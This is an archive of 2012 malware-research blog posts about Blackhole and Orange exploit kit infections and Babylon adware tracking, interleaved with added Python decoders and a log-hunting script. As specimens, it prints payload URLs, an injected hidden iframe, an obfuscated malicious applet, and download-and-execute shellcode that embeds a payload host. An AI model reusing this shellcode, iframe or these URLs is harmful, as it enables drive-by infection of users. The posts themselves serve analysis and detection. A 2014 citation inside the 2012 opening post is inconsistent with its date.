Friday, August 31, 2012

Payloads URI die hard - Blackhole Exploit Kit

(Contents are updated regularly to share the facts as closely as possible)
Some MDL have already reported and published these URLs, so I have no reason to hold them back any more:
payloads:

(1) hXXp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775
↑ the classical one

(2) hXXp://02e9126.netsolhost.com/nfjviq3D/index.html
↑ Good trick, don't be fooled by the index.html (Information: this is actually an iframer leading to BHEK at the link below)
hXXp://66.175.222.25[/]pxyk80ujzb03h.php?y=p7tqagmzf8qdjqpi
↑ Not the usual one, look at the parameter of the php file

(3) hXXp://crane.co.th/YabymY6p/index.html
↑ see the randomized subdir above?
Conclusion: You can set up almost every infection scheme in the Blackhole interface, yet the characteristics are still there. Note: this page exists because of the team work of malware researchers. Thank you to those who contributed the contents, to those who corrected and advised, to those who read and share, and God & prayers bless those who take direct action straight at these threats.

BTW, no, I am telling you: #MalwareMustDie is not selling crap.

(Updated) Beware of the BABYLON, Adware that spreads like Exploit Kit

A lot of you know about Babylon Adware, don't you?
We ignored these guys for so long. We thought they would raise no threat. Now they are spreading "with" a good evil-distribution scheme (if I cannot call it infection).
Looking at the network they have built (investigated below), Babylon is now an adware that spreads like an Exploit Pack. We should raise market awareness of this trend; who knows, one day malware may come riding the Babylon scheme and become a new epidemic vector..
Please read the PoC below:
We snipped a research session and found a URL like the one below:
>> --12:23:06--
>> http://www.destorage.info/installmate/php/get_cfg.php?step_id=1
>> => `get_cfg.php@step_id=1'
>> Resolving www.destorage.info... 46.165.199.26
>> Connecting to www.destorage.info|46.165.199.26|:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 6,614 (6.5K) [text/html]
>> 100%[====================================>] 6,614 --.--K/s
>> 12:23:07 (1.07 MB/s) - `get_cfg.php@step_id=1' saved [6614/6614]
Got curious, so I looked inside↓
>> blah\GnuWin32\bin\dump>cat "get_cfg.php@step_id=1"
>> (the file is UTF-16LE text, so cat shows a stray glyph for the byte-order mark and a blank after every character; rendered below with those null bytes removed)
>> [Installer]
>> PublisherName="Premium"
>> ProductName="Setup"
>> ProductVersion="1.0"
>> ProductCode="{17EB6DDC-1522-72F9-D5AE-7B1FC1C487CE}"
>> PublisherID="0"
>> SourceID="0"
>> PageID="0"
>> AffiliateID="%Installer_AffiliateID%"
>> InstallerID="0"
>> VisitorID="0"
>> Locale="en"
>> Date="2012/08/31"
>> Time="3:23:06"
>> ShowInTaskbar="1"
>> HideScreens="0"
>> InstallerMode=""
>>
>> [Server]
>> ID="0"
>> Location="DE"
>>
>> [UserInfo]
>> GeoLocation="JP"
>> IPAddress="121.3.173.191"
>> WebBrowser="0"
>>
>> [RndGen]
>> Percentage="21"
>>
>> [Screen75]
>> Title="Setup"
>> Button1="Yes"
>> Button2="&No"
>> Label1="Are you sure?"
>> :
>> :
>> etc
FYI, this server is serving Babylon adware and is spreading it either with its "kinda" exploit pack or by using exploit-pack methods. So below is the conclusion:
1. The infector URL uses the exploit pack format.
2. It definitely logs the PC information during installation via the browser and takes a snapshot of it on the server.
3. It backdoors the installer w/o the user's permission.
Analysis:

Good researcher friends to whom I promised confidentiality advised that the site also hosts "suspected" malware (I haven't analyzed it yet), as follows:

> 46.165.199.26/v9/
> 46.165.199.26/v10/ VirusTotal check is HERE-->>>[CLICK]
> 46.165.199.26/v14/
> 46.165.199.26/v52/
> 46.165.199.26/v209/
Additional/updated note: ↑I am following the downloaded program reported above (VT report). This file explains to us why the PC information got uploaded to the server.
File: WxDownload.exe 68ee6e35ef7f495be727131dc4ef5ed9
It is a binary installer built with Tarma InstallMate 7, which, like the usual installer, drops:
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setup.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\_Setupx.dll
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.exe
C:\Document..\Local Settings\Temp\{DC6AA..983FD}\Setup.ico
C:\Document..\Local Settings\Temp\Tsu5F686192.dll
(I don't go into details on it yet.....)
↑It is "assumed" those will start installing nasty adware on your PC and so on.. (I am sorry for not going into detail on it either.) My point is, this installer sends your PC data to the motherships as per below;
DNS QUERIES:
www.reportde.info IN A +
www.destorage.info IN A +
www.reportnl.info IN A +
www.nlstorage.info IN A +

HTTP POSTS:
www.reportde.info POST
www.reportnl.info POST
values: "/installmate/php/track_installer_products.php?installer_version=75 HTTP/1.1"

HTTP REQUESTS:
www.destorage.info GET (3 times)
www.nlstorage.info GET (3 times)
values = /installmate/php/get_cfg.php?
step_id=1&
installer_id=5040612c774655.01371722&
publisher_id=10&
source_id=0&
page_id=0&
affiliate_id=0&
geo_location=JP&
locale=EN&
browser_id=4 HTTP/1.1
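An added example, not from the original post, that decodes the two telemetry channels shown above. The get_cfg.php response is rebuilt here from the sections quoted in the cat output and stored the way the server delivered it, as UTF-16LE text with a byte-order mark (that encoding is why the dump above shows a stray glyph at the start and a blank after every letter); the GET request line is the one quoted above. The INI text and query string are constants taken from the post; which query parameters count as visitor data is my reading of the author's conclusion.

```python
import configparser
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the get_cfg.php response rebuilt from the sections quoted
# in the post, stored as the server delivered it (UTF-16LE with a BOM).
CFG_TEXT = """[Installer]
PublisherName="Premium"
ProductName="Setup"
ProductVersion="1.0"
ProductCode="{17EB6DDC-1522-72F9-D5AE-7B1FC1C487CE}"
PublisherID="0"
SourceID="0"
PageID="0"
AffiliateID="%Installer_AffiliateID%"
InstallerID="0"
VisitorID="0"
Locale="en"
Date="2012/08/31"
Time="3:23:06"
ShowInTaskbar="1"
HideScreens="0"
InstallerMode=""

[Server]
ID="0"
Location="DE"

[UserInfo]
GeoLocation="JP"
IPAddress="121.3.173.191"
WebBrowser="0"

[RndGen]
Percentage="21"

[Screen75]
Title="Setup"
Button1="Yes"
Button2="&No"
Label1="Are you sure?"
"""
CFG_BYTES = b"\xff\xfe" + CFG_TEXT.encode("utf-16-le")

# The GET request target quoted in the post.
GET_REQUEST = ("/installmate/php/get_cfg.php?step_id=1&installer_id=5040612c774655.01371722"
               "&publisher_id=10&source_id=0&page_id=0&affiliate_id=0&geo_location=JP"
               "&locale=EN&browser_id=4")

# Query parameters the post calls out as data about the visitor's machine
# (GeoIP location, locale, browser). This selection is mine.
VISITOR_KEYS = ("geo_location", "locale", "browser_id")


def naive_view(data: bytes) -> str:
    """What a byte-oriented `cat` shows for a UTF-16LE file: the BOM as two odd
    characters, then a blank after every letter (each code unit's high byte is 0x00)."""
    return data.decode("latin-1").replace("\x00", " ")


def parse_cfg(data: bytes) -> dict:
    """Decode the BOM-prefixed UTF-16 file properly and parse it as INI.
    Returns {section: {key: value}} with the surrounding quotes stripped."""
    text = data.decode("utf-16")  # the BOM selects the byte order and is consumed
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep key case (GeoLocation, IPAddress)
    cp.read_string(text)
    return {sec: {k: v.strip('"') for k, v in cp[sec].items()} for sec in cp.sections()}


def visitor_params(request_target: str) -> dict:
    """Pick the visitor-identifying parameters out of the installer's GET request."""
    qs = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return {k: qs[k][0] for k in VISITOR_KEYS if k in qs}


if __name__ == "__main__":
    print("as cat shows it:", naive_view(CFG_BYTES)[:40])
    print("server recorded:", parse_cfg(CFG_BYTES)["UserInfo"])
    print("client sent:    ", visitor_params(GET_REQUEST))
```

The [UserInfo] section on the server side and the geo_location/locale/browser_id parameters on the wire are the two halves of the same record, which is what the author's conclusion 2 points at.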
In the HTTP POST part it sends the installer version info, which may be OK, but.. in the HTTP GET part it sends your GeoIP location, PC locale, browser information and, of course, your IP address. This is the PoC proving why the records on the server exist. OK, the research continued to the detected IP addresses of the Babylon spreader services. Multiple directories were detected being used for download-link distribution:
> Fast check showed:
> /v9/ /v17/ /v14/ /v16/ /v20/ /v21/ /v10/ /v26/ /v37/ /v33/
> /v27/ /v34/ /v31/ /v43/ /v46/ /v47/ /v48/ /v45/ /v51/ /v42/
> /v58/ /v56/ /v52/ /v54/ /v53/ /v57/ /v62/ /v68/ /v64/ /v66/
> /v69/ /v70/ /v72/ /v67/ /v75/ /v71/ /v73/ /v78/ /v76/ /v74/
> /v77/ /v79/ /v82/ /v80/ /v81/ /v87/ /v86/ /v88/ /v84/ /v83/
> /v98/ /v94/ /v96/ /v95/ /v99/ /v97/
>
> I guess you can try 1xx, 2xx, 3xx
Another researcher detected the mirroring scheme of 46.165.199.26 to IP addresses in the same segment:
46.165.199.26/v14/ 301720
46.165.199.3/v14/ 301720
46.165.199.25/v14/ 301720
And some similarities of the downloaded files were detected:
> http://95.211.152.157/v17/ 299048
> filename="BCool.exe"
> http://95.211.150.1/v17/ 299048
> filename="BCool.exe"
> http://95.211.152.156/v17/ 299048
> filename="BCool.exe"
As you can see, adware is something we cannot just ignore. This adware's distributor has started to play nasty & victimize innocent people.
Feel free to put your comment to add to the current information.

Thursday, August 30, 2012

Undetected Orange Exploit Kit Infector

If you see an infected page with this code:

Don't be surprised that it is undetected:

This is the Orange exploit pack infector HTML analyzed in ---->>> [HERE]

What Orange Exploit Kit Dropped

It is an HTML page infected with the Orange exploit pack.
I am following the @kafeine report of it.
Source: hxxp://breitlingline.biz/

With the infector HTML/iframe:

<iframe src="hxxp://petrol.thehickorymotormile.com:8382/AZAgQw?wITGN=78" width=0 height=0 frameborder=0></iframe>

The VT detection is very low = 1/41

Java exploits for CVE-2008-5353 and CVE-2012-0507 were detected at the URL the iframe redirects to, giving you a malicious applet like:

<html><head></head>
<body>
<applet archive="24" code="WCfn.class" width="8" height="7"><param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52"><param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"></applet>
<p>HKKatmqLjj</p><br>
<embed src="255" width="518" height="364">
</body>
</html>
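The applet's two parameters are lists of decimal numbers separated by "!". As an added example that is not part of the original post, the decoder below recovers their text: it extracts the param values from the applet tag quoted above, finds the per-character shift by looking for an "http" prefix (the values turn out to be ASCII codes minus one, so the applet must add one back before it can use them), and prints the results defanged (hxxp). The regex and the "http" prefix assumption are mine; the applet HTML is the sample input, taken from the post.

```python
import re
from typing import Dict, Optional

# Sample input: the <applet> tag from the infected page quoted in this post.
APPLET_HTML = (
    '<applet archive="24" code="WCfn.class" width="8" height="7">'
    '<param name="ur34" value="103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!'
    '104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!'
    '110!114!103!79!97!88!62!100!119!111!104!99!60!48!49!37!101!104!99!60!49!52">'
    '<param name="enm3" value="69!77!70!117!67!86!77!45!100!119!100"></applet>'
)

PARAM_RE = re.compile(r'<param\s+name="([^"]+)"\s+value="([^"]*)"', re.IGNORECASE)


def extract_params(html: str) -> Dict[str, str]:
    """Collect <param name=... value=...> pairs from an applet tag."""
    return dict(PARAM_RE.findall(html))


def decode_codes(value: str, offset: int) -> str:
    """'!'-separated decimals -> text, adding `offset` to every code before chr()."""
    return "".join(chr(int(tok) + offset) for tok in value.split("!") if tok)


def guess_offset(value: str, expected_prefix: str = "http") -> Optional[int]:
    """Find the per-character shift by trying small offsets until the decoded
    text starts with a known plaintext prefix (here the URL scheme)."""
    for offset in range(-16, 17):
        try:
            if decode_codes(value, offset).startswith(expected_prefix):
                return offset
        except ValueError:  # chr() of a negative code for large negative offsets
            continue
    return None


def defang(text: str) -> str:
    """Render URLs the way this blog does, so nothing decoded is clickable."""
    return text.replace("http://", "hxxp://").replace("https://", "hxxps://")


def decode_applet(html: str, url_param: str = "ur34") -> Dict[str, str]:
    """Decode every param of the applet using the offset learned from the URL param."""
    params = extract_params(html)
    offset = guess_offset(params[url_param])
    if offset is None:
        raise ValueError("could not determine the encoding offset")
    return {name: defang(decode_codes(value, offset)) for name, value in params.items()}


if __name__ == "__main__":
    for name, text in decode_applet(APPLET_HTML).items():
        print(f"{name}: {text}")
```

The first parameter decodes to a download URL on the same diesel.thehickorymotormile.com:8382 host that appears in the shellcode further down; the second is the file name the dropped executable is to be saved under.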

Taking you to the execution of the below shellcodes:

4c 20 60 0f a5 63 80 4a 3c 20 60 0f 96 21 80 4a 90 1f 80 4a 30 90 84 4a 7d 7e 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 88 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff

4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41 41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03 fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02 eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f 65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff
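The download URL and the DLL name the author lists next are sitting in clear text at the end of the second shellcode. As an added example, not from the post, the snippet below turns that hex dump back into bytes and pulls out the printable ASCII runs the way `strings -n` does, defanging anything that looks like a URL. The dump is the second one above; the long run of 0xff padding in its middle is shortened here since it carries no strings. The minimum run length of 8 is my choice to keep the output to the meaningful strings.

```python
import re
from typing import List

# Sample input: the second shellcode dump quoted in the post (the run of 0xff
# padding after "e8 22" is shortened; it contains no printable strings).
SHELLCODE_HEX = """
4c 20 60 0f 05 17 80 4a 3c 20 60 0f 0f 63 80 4a a3 eb 80 4a 30 20 82 4a 6e 2f 80 4a 41 41 41 41
26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 39 80 4a 64 20 60 0f 00 04 00 00 41 41 41 41
41 41 41 41 b0 83 90 90 eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23 8b df 03 da b2 46 03 da
53 b2 0a 03 da 8b fb aa 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2 0b 03 fa 80 3f 00 75 01
47 57 50 50 57 b0 ff 66 b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03 fa 53 8b c6 05 5e 00 00
00 50 56 56 6a 46 eb 02 eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b 5d 08 8b 6d 00 55 8b 43
3c 8b 44 18 78 0b c0 74 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad 8d 2c 03 8b 74 8f fc 03
f3 33 c0 33 d2 99 ac 03 d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2 e2 58 5d eb ba 58 0f b7
54 4d fe 03 1c 90 5d 5f ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2 ae 4f 33 c0 88 07 58 5f
c2 04 00 e8 22 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
29 15 d2 54 bd fa 58 4c cc 70 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63 63 63 63 63 2e 65
78 65 00 75 72 6c 6d 6f 6e 2e 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65 6c 2e 74 68 65 68
69 63 6b 6f 72 79 6d 6f 74 6f 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f 73 68 50 62 59 3f
65 78 70 69 64 3d 34 26 66 69 64 3d 35 ff ff ff
"""


def hex_dump_to_bytes(dump: str) -> bytes:
    """Parse a whitespace-separated hex dump into raw bytes."""
    return bytes(int(tok, 16) for tok in dump.split())


def printable_strings(data: bytes, min_len: int = 8) -> List[str]:
    """Runs of at least min_len printable ASCII bytes (0x20..0x7e), like `strings -n`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def defang(text: str) -> str:
    """Render URLs the way this blog does, so nothing extracted is clickable."""
    return text.replace("http://", "hxxp://").replace("https://", "hxxps://")


def shellcode_indicators(dump: str, min_len: int = 8) -> List[str]:
    """Strings worth a second look in a download-and-execute shellcode:
    the imported DLL, the target file name and the payload URL."""
    return [defang(s) for s in printable_strings(hex_dump_to_bytes(dump), min_len)]


if __name__ == "__main__":
    for s in shellcode_indicators(SHELLCODE_HEX):
        print(repr(s))
```

Besides the URL, the output shows the "urlmon.dll" import name and a ".exe" file name template right before it, which is the download, save and execute pattern the author describes; the run of 0x41 bytes at the start is filler preceding the shellcode proper.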

And your PC will download from:

hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=% (and)
hxxp://diesel.thehickorymotormile.com:8382/oshPbY?expid=4&fid=5

The first & second downloads are the same payload malware:

0318c42a3f.exe 059b029e9f645bafde2d603b73221f19

Which will drop:

C:\Documents and Settings\Administrator\Application Data\Apynf
C:\Documents and Settings\Administrator\Application Data\Apynf\qeawq.kio
C:\Documents and Settings\Administrator\Application Data\Iluva
C:\Documents and Settings\Administrator\Application Data\Iluva\ipamr.exe
C:\Documents and Settings\Administrator\Application Data\Inazci
C:\Documents and Settings\Administrator\Application Data\Inazci\ikat.uql

OR

C:\Documents and Settings\Administrator\Application Data\Xuhika
C:\Documents and Settings\Administrator\Application Data\Xuhika\kaby.zio
C:\Documents and Settings\Administrator\Application Data\Ydywba
C:\Documents and Settings\Administrator\Application Data\Ydywba\kifag.exe
C:\Documents and Settings\Administrator\Application Data\Ytwy
C:\Documents and Settings\Administrator\Application Data\Ytwy\cuakr.abp

Those binaries make this registry key:

HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Ocduge

with new value:

HKU\..\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
value name: AppData
data: C:\Documents and Settings\Administrator\Application Data <-- malware executable home base dir

Fake Flash Updater presented by #blackhole

It is an epidemic of Blackhole infection URLs in the wild.
Below are the analyses of the dropped malware so far:

6d84a5f24fe9c0f88a379ab0b6890cc59b76f2f1df7d1743a3e03a1786a57fe2
e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206
b87663fee7295c30d97b399ebbbea644c20e3f49778dfd8cc706574fceff7642

Hunting #Tips!
Below are the similarities of the current epidemic:
1. New obfuscation like below

2. Shellcode API calls from kernel32.dll and urlmon.dll were used to download, save, execute and daemonize the payload trojan, like:

3. Payload is packed by the newest method to avoid packer-DB detection
4. Infected URLs can be grepped by ".php?f=" and ".php?h=" in almost all MDL
5. This is the popular malware downloader used by current epidemic:
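To make hunting tip 4 concrete, here is an added example, not from the post, that runs the two grep patterns over constructed proxy-log lines (squid access.log style: timestamp, client, method, URL). As a generalization from the "classical" landing URL shown at the top of this page, it also matches main.php?page= followed by exactly 16 hex characters; that third rule is my addition. Like the grep patterns it flags candidates for review rather than giving a verdict, which the first sample line (a harmless page with ?f=) is there to show.

```python
import re
from typing import List, Optional, Tuple

# Hunting tip 4: substrings to grep for in URL lists and proxy logs.
GREP_PATTERNS = (".php?f=", ".php?h=")

# My generalization of the "classical" Blackhole landing URL seen at the top of
# this page: main.php?page=<16 hex chars>. A regex, so "page=about" is not hit.
CLASSIC_LANDING_RE = re.compile(r"/main\.php\?page=[0-9a-f]{16}(?:$|[&#])", re.IGNORECASE)

# Constructed sample log (squid access.log style: timestamp client method url).
SAMPLE_LOG = """\
1346400001.123 10.0.0.5 GET http://www.example.org/index.php?f=help
1346400002.456 10.0.0.7 GET hxxp://mxcwqdkbphcx.lookin.at/main.php?page=c9ee61ed42809775
1346400003.789 10.0.0.9 GET http://cdn.example.net/static/app.js
1346400004.000 10.0.0.5 GET http://203.0.113.10/q.php?h=a1b2c3d4e5f6
1346400005.111 10.0.0.8 GET http://www.example.com/blog/main.php?page=about
"""


def classify_url(url: str) -> Optional[str]:
    """Return the name of the first hunting rule the URL matches, or None."""
    for needle in GREP_PATTERNS:
        if needle in url:
            return "grep:" + needle
    if CLASSIC_LANDING_RE.search(url):
        return "classic-landing:main.php?page=<16hex>"
    return None


def hunt(log_text: str) -> List[Tuple[str, str, str]]:
    """Scan log lines; return (client, url, rule) for every line a rule fires on."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # blank or truncated line
        client, url = fields[1], fields[3]
        rule = classify_url(url)
        if rule is not None:
            hits.append((client, url, rule))
    return hits


if __name__ == "__main__":
    for client, url, rule in hunt(SAMPLE_LOG):
        print(f"{rule:40} {client:10} {url}")
```

The hits are a work list: the two internal clients that fetched ?f= and ?h= URLs are the ones whose machines to look at first, and the 16-hex page= match is the one most worth pulling the landing page for.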

New Blackhole HTML Infector found

I came across this sample today from MDL, analyzed it and wrote a report in VT at the URL below: https://www.virustotal.com/file/bb95e70c6ea8aaf8134bf9c9645aef715e4b4806004afbcfa9cd572b44939d82/analysis/1346296410/

My comment:
It is a new injected infection code, kinda long, but Malzilla and jsunpack break it after 3 loops of tries. It was uploaded to the infected server on 2012 Aug 30th at 11:30. Very new. No wonder VT has a detection ratio of (2/42)

It redirects you to the infected payload using the Java exploit.

The payload detection ratio is 11/42 and can be viewed here:
https://www.virustotal.com/file/e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206/analysis/

You can grab the sample directly from the infection source, still up/alive.

Or contact me for more details.

#MalwareMustDie!

Interesting Idea: (Pastebin) How to stop Blackhole Exploit Kit by using its vulnerability

Just found this anonymous article posted on Pastebin, which explains "How to stop Blackhole Exploit Kit by using its vulnerability".

So many Blackhole servers have come up to serve malware at the same time. The article explains the weaknesses in the security configuration of the nginx used by these Blackholes, and the possibility of exploiting its redirection features to perform a loop that DoSes its service.

Wednesday, August 29, 2012

#MalwareMustDie - Day1 Opening Day Report

We have had a very positive response from researchers after releasing the Twitter forum of #MalwareMustDie. Thanks to the reverser and analyst friends who spontaneously joined & got actively involved, and to those who monitored the stream. It was the busiest 6 hours of my life.

From the outside you may see stuff like this:
Like you can see in the widget in the right panel of this blog..

In actuality the admin panel went crazy like in these snips:
which were rolling fast with mentions & follows. Boy, we're onto something!

It is a good start indeed, let's make a go for it, a good 6 hours of first response!!
Thank you guys, you're all great and let's stay in touch, because I am compiling some honeypot reports for tomorrow & trying to build cases. Without leads we will work fast like today, cracking & yelling crazy in chaos.

That's the spirit boys! And we really think #MalwareMUSTdie!!

Tuesday, August 28, 2012

The rise of "MalwareMustDie!" (TL;DR)

This post marks our inaugural blog entry, elucidating the inception of the MalwareMustDie movement.
Spanish: This is our first blog article, explaining why the MalwareMustDie movement was started.
Japanese: This is our first blog post, and it explains the reason the MalwareMustDie movement began.
Latin: This is our first blog article, on how the MalwareMustDie movement had its beginning.

Malware poses an ongoing threat to the internet and computer industry, persisting for over 15 years as a well-organized "industry." Despite continuous efforts by security professionals to analyze and mitigate malware, its evolution driven by the greed of actors remains unstoppable. The malware industry thrives on infecting and compromising systems, transforming its malicious intent into a business-like activity.

Malware significantly impacts internet and IT technology advancements, hindering progress despite the daily efforts of security experts. The actors behind malware, motivated by financial gain and the low risk of legal consequences, continue to grow exponentially. The variety and rapid pace of malware variants aim to evade detection and mitigation, with bad actors exploiting the lag time between mitigation signature releases.

Malware actors range from criminals to state sponsors, hacktivists, and even extremist movements, contributing to the proliferation of spyware and hacking tools. The transformation of malware into a modern form of online crime involves selling victims' credentials, stealing data, and extortion through ransomware. This not only affects internet users technically but also raises ethical concerns as some adopt malware methodologies legally, compromising privacy rights.

Despite efforts to combat malware, actors employ sophisticated techniques to cover their traces, necessitating global coordination and cooperation among law enforcement agencies. The profitability and reduced risks associated with cybercrime compared to traditional crime contribute to its growing rates, as highlighted by a 2014 Europol report.

The internet's current structure, accessible to both good and bad actors, poses challenges in curbing malware activities due to legal, territorial, and political boundaries. Malware coders actively learn and improve their techniques, exchanging information in "dark side" forums, leading to the development of new exploits and zero-day vulnerabilities.

The motivation for bad actors is primarily financial, driven by the economic benefits of cybercrime, or comes from some form of state-sponsored program. In contrast, efforts to combat malware are scattered across groups and organizations, relying on threat information as a commodity. The imbalance in the fight against the rapid growth of malware calls for a better scheme to match its speed.

To address the situation, a collective effort is needed, involving hands-on dedication to threat research, raising awareness, and reporting malicious threats. The MalwareMustDie volunteer campaign on Twitter seeks to engage individuals in the fight against malware, emphasizing that the collective effort is essential. Reading and learning about malware, joining trusted security communities, and actively preventing infections are steps towards improving the situation.

In conclusion, malware remains a pervasive threat, requiring a unified front to mitigate its impact and safeguard the online environment. MalwareMustDie, as a persistent campaign, serves as a call to action, urging individuals to contribute in any form to the collective effort against the persistence of malware in the digital landscape.

Let us uphold the true purpose of the internet for the advancement of humanity's future. For that purpose, the internet always needs your help.

Hail, Holy Queen, Mother of Mercy. To thee do we cry, poor banished children of Eve. To thee do we send up our sighs, mourning and weeping. Turn then, our advocate, thine eyes of mercy toward us. And after this our exile, show unto us the blessed fruit of thy womb, Jesus. O clement, O loving, O sweet Virgin Mary. Pray for us, O holy Mother of God. That we may be made worthy of the promises of Christ.
(Note: The preceding prayer does not imply that MalwareMustDie is influenced by any religious beliefs; rather, it underscores our commitment to conducting ourselves in a manner aligned with moral principles.)

MalwareMustDie, Non-Profit Organization (NPO)
malwaremustdie.org (c)MalwareMustDie, 2012-2024